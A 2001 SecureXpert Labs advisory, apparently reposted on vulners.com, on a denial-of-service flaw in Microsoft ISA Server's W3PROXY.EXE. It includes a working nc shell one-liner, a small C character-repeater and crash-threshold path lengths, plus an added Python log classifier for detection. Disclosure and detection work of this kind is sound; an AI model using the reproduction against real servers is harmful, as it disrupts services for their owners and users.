[SX-20010320-2] - Microsoft ISA Server Denial of Service

2001-04-17 00:00:00
vulners.com

FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2]

Denial of Service in Microsoft ISA server v1.0

Summary

Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a
simple network-based attack which stops all incoming and outgoing web
traffic from passing through the firewall until the firewall is rebooted
or the affected service is restarted.

If the firewall is configured to use the "Web Publishing" feature (inbound
HTTP proxy to a web server), this attack can be performed remotely.

Details

Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is used
for both the "publishing" of internal web servers to the external network and
for proxying of internal requests to external web servers.

Sending a URL with a long pathname component to this proxy will cause it to
terminate with an access violation error.

For example, sending the (valid) HTTP request:

GET http://hostname/aaa[3000 more occurrences of 'a'] HTTP/1.0\n\n

to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to
terminate with an access violation.

This can easily be reproduced from a Linux system by using the following simple
shell command:

printf "GET http://${HOST}/%s HTTP/1.0\n\n" "$(./repeat ${x} ${y})" | \
nc ${HOST} 80

where:

  • printf is the shell utility of that name
  • ${HOST} is an environment variable set to a hostname which resolves to the
    external IP of the ISA server
  • ./repeat is the simple C program whose source is given below
  • ${x} is the ASCII value of the character to insert into the generated URL
  • ${y} is the number of repetitions of ${x}

The `repeat' program can be compiled from the following simple C source:

/*
 * repeat.c - quick-n-dirty hack to output argv[2] instances of the
 * character whose ASCII value is given as argv[1]
 * WARNING - this has absolutely no error checking!
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi, atol, exit */

int main (int argc, char **argv) {
    int character;
    long repetitions, i;

    if ( argc != 3 ) {
        printf("usage: repeat char reps\n");
        exit(1);
    }
    character = atoi(argv[1]);    /* ASCII value of the character to emit */
    repetitions = atol(argv[2]);  /* number of copies to write to stdout */

    for (i = 0L; i < repetitions; i++) {
        printf ("%c", character);
    }
    return 0;
}

The behaviour of W3PROXY.EXE depends on both the value of ${x} and the
value of ${y}. With ${x} of 55 (the character '7'), the following behaviour is
observed for different values of ${y}:

100: processes correctly, returns "404 Object Not Found" from target web server.
200: returns 404
250: returns 404
254: returns 404
255: returns "414 URL Too Long"
260: returns 414
300: returns 414
2000: returns 414
2100: returns 414
2200: returns 414
2300: returns 414
2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and
is then terminated with an access violation.
2350: W3PROXY.EXE is terminated on the first attempt.
All larger values: as 2350, above.

With different values of ${x}, different behaviour is observed for some values
of ${y}. This, along with preliminary analysis of the Dr. Watson logs generated
upon termination of W3PROXY.EXE, initially suggested that an exploitable overflow
may have been present. However, source code analysis by Microsoft has indicated
that only a heap overflow is present, and therefore that this vulnerability is
not exploitable beyond denial of service.
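
As an added defensive illustration (not part of the original advisory), the following Python classifies HTTP request lines against the path-length bands tabulated above, so proxy or IDS logs can be checked for requests in the "414" or crash range; the band labels and the sample request lines are constructed for this example.

```python
"""Classify HTTP request targets against the W3PROXY.EXE path-length
bands reported in advisory SX-20010320-2 (constructed example)."""
from urllib.parse import urlsplit

# Thresholds from the advisory's table: repetitions of one character in
# the path component of the URL. Band labels are this example's own.
MAX_PROXIED = 254       # <= 254: forwarded to the target web server (404)
MIN_URL_TOO_LONG = 255  # 255 and up: proxy itself answers 414
CRASH_REPEATED = 2300   # 2300: W3PROXY.EXE crashed after several requests
CRASH_FIRST_HIT = 2350  # >= 2350: W3PROXY.EXE terminated on first request


def path_length(request_line: str) -> int:
    """Length of the path component of an HTTP request line.

    Handles absolute-form targets (GET http://host/path HTTP/1.0), as sent
    to a proxy, and origin-form targets (GET /path HTTP/1.0). The query
    string is not counted, matching the advisory's "pathname component".
    """
    parts = request_line.split()
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {request_line!r}")
    target = parts[1]
    path = urlsplit(target).path if "://" in target else target.split("?", 1)[0]
    return len(path.lstrip("/"))


def classify(request_line: str) -> str:
    """Map a request line to the band its path length falls into."""
    n = path_length(request_line)
    if n >= CRASH_FIRST_HIT:
        return "crash"
    if n >= CRASH_REPEATED:
        return "crash-on-repeat"
    if n >= MIN_URL_TOO_LONG:
        return "414"
    return "proxied"


def suspicious(log_lines):
    """Return (line_no, band) for every line not in the normal 'proxied' band."""
    return [(i, classify(l)) for i, l in enumerate(log_lines, 1)
            if classify(l) != "proxied"]


# Constructed sample request lines, not captured traffic ('7' is ASCII 55).
SAMPLE_LINES = [
    "GET http://www.example.com/index.html HTTP/1.0",
    "GET http://www.example.com/" + "7" * 300 + " HTTP/1.0",
    "GET /" + "7" * 2400 + " HTTP/1.0",
]

if __name__ == "__main__":
    for no, band in suspicious(SAMPLE_LINES):
        print(f"line {no}: {band}")
```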

Status

Microsoft Corp. was informed of this vulnerability on April 2, 2001.
A hotfix to address this issue will be released on April 16, 2001,
synchronized with the release of this advisory.

Credits

Richard Reiner, SecureXpert Labs
Graham Wiseman, SecureXpert Labs
Matthew Siemens, SecureXpert Labs
Kent Nicolson, SecureXpert Labs

About SecureXpert DIRECT

SecureXpert DIRECT is an advance security advisory service provided to qualified
subscribers by SecureXpert Labs. Subscriptions are free of charge and may be
obtained at http://www.securexpert.com/services.html.